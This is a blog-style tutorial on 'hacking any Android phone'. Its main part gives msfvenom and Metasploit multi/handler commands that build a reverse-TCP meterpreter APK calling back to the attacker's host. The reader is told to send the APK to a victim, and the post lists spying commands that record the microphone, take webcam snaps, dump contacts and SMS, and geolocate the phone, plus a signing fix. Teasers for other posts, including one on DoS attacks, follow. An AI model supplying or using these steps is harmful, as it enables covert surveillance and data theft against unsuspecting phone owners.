Skip to main content

Hacking any Android Phone : MSFVenon - Metasploit Playload Generator.

STEPS :

1. Fire Up kali and open command terminal.

2. Set payload and create custom windows executable.
Command:

root@kali:-# msfvenom -p android/meterpreter/reverse_tcp  LHOST=192.168.0.110 LPORT=4444 R > andro.apk
(To know your LHOST, open new terminal and type ifconfig )

Your apk file is being saved in the Home folder.

Note: Don't add any stray space characters anywhere. Use the command as is (after changing the LHOST and LPORT as needed).

3. Transfer/mail this file (here andro.apk) file to the victim's phone and install it.

4. Start the metasploit framework console as follows :
          
Command:
root@kali:-# msfconsole

5. Now it's time to open and setup multi-handler. Follows the steps :
msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
        Payload Handler is being started........

6. When the victims clicks on the app(installed as MAIN ACTIVITY in the menu) in his phone, meterpreter session will be established.

7. Try the following exploit commands :
    - record_mic
    - webcam_snap
    - webcam_stream
    - dump_contacts
    - dump_sms
    - geolocate
************************************************************************
Error fixing(incase you get PARSE ERROR)

Two methods:

1)Type command "d2j-apk-sign andro.apk
                                               
                                               or

 2) To fix this error download signapk - Click here to download

Steps to follow

  1. Open Signapk folder then open cmd.
  2. Copy the andro.apk(the app you made) in Signapk folder.
  3. Type java -" jar signapk.jar certificate.pem key.pk8 andro.apk andro-signed.apk "in cmd(not double quotes).
  4. copy it in your phone and install it.
Hope this works... :)

Comments

Post a Comment

Popular posts from this blog

These are the precautions you have to take, When your E-MAIL has been Hacked.

It can be a real nightmare if someone hacks and takes control of your email account as it may contain confidential information like bank logins, credit card details and other sensitive data. If you are one such Internet user whose email account has been compromised, then this post will surely help you out by suggesting some of the steps that you need to take as soon as you realize that your  email account is hacked . Here is a list of steps and procedures that you need to follow in order to initiate the password recovery process: Steps to Recover Gmail Password: It can be a big disaster if your Gmail account has been compromised as it may be associated with several services like Blogger, Analytics, Adwords, Adsense, Orkut etc. Losing access to your Gmail account means losing access to all the services associated it with too. Here is a list of possible recovery actions that you can try: Step-1:  Try resetting your password! This is the fir...
Post a Comment
Read more

Block or Redirect Unwanted Websites Using HOSTS File.

The  hosts file  is one of the interesting and useful feature of both Windows and Linux operating systems that provides many handy options in addressing network nodes. For instance, you can use the  hosts  file to block  annoying ads, pop-ups, banners, porn sites, or even redirect one website to another. In this post I will show you how to play around with the  hosts  file to accomplish some of the above mentioned jobs. What is a hosts File? The  hosts  file is just like any other computer file that is used by the operating system to map hostnames and domain names on to their corresponding IP addresses. In other words, when you type “google.com” on your browser’s address bar, your computer will look for the  hosts  file to see if it contains the corresponding IP address for the domain name you typed (google.com). In case if no entry is present in the  hosts  file, the request is then passed on to the DN...
Post a Comment
Read more

What is DOS ? How to Hack with DOS Easily?

What is DOS ? How to Hack with DOS Easily? Guys,you may have seen Mr. Robot and remember the event when F-society use the DOS as a calling card to lure Elliot into helping them take down E-Corp or you may have been struck in situation when you try to open a Website  only to see a notification that Website is down. What is this? Yes, this is a DOS Attack. A denial of service (DoS) attack is an attack that clogs up so much memory on the target system that it can not serve it’s users, or it causes the target system to crash, reboot, or otherwise deny services to legitimate users.There are several different kinds of dos attack as discussed below:- 1) Ping Of Death  :- The ping of death attack sends oversized ICMP datagrams (encapsulated in IP packets) to the victim.The Ping command makes use of the ICMP echo request and echo reply messages and it’s commonly used to determine whether the remote host is alive. In a ping of death attack, however, ping causes the remote ...
Post a Comment
Read more